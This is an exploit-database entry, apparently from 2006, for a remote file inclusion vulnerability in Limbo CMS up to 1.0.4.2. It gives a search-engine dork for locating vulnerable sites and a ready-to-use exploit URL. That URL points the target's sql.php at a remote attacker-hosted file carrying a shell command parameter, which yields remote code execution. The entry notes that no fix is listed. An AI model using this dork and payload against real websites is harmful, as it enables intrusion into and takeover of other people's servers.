Limbo CMS <= 1.0.4.2 (sql.php) Remote File Inclusion Vulnerability

2006-04-29 00:00:00

Title: Limbo CMS <= 1.04 Remote File Inclusion
URL: http://www.limbo-cms.com/
Dork: inurl:"index2.php?option=rss" OR "powered By Limbo CMS"
Credits: [Oo]

Exploit: /classes/adodbt/sql.php?classes_dir=http://yourhost/cmd.gif?cmd=ls

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.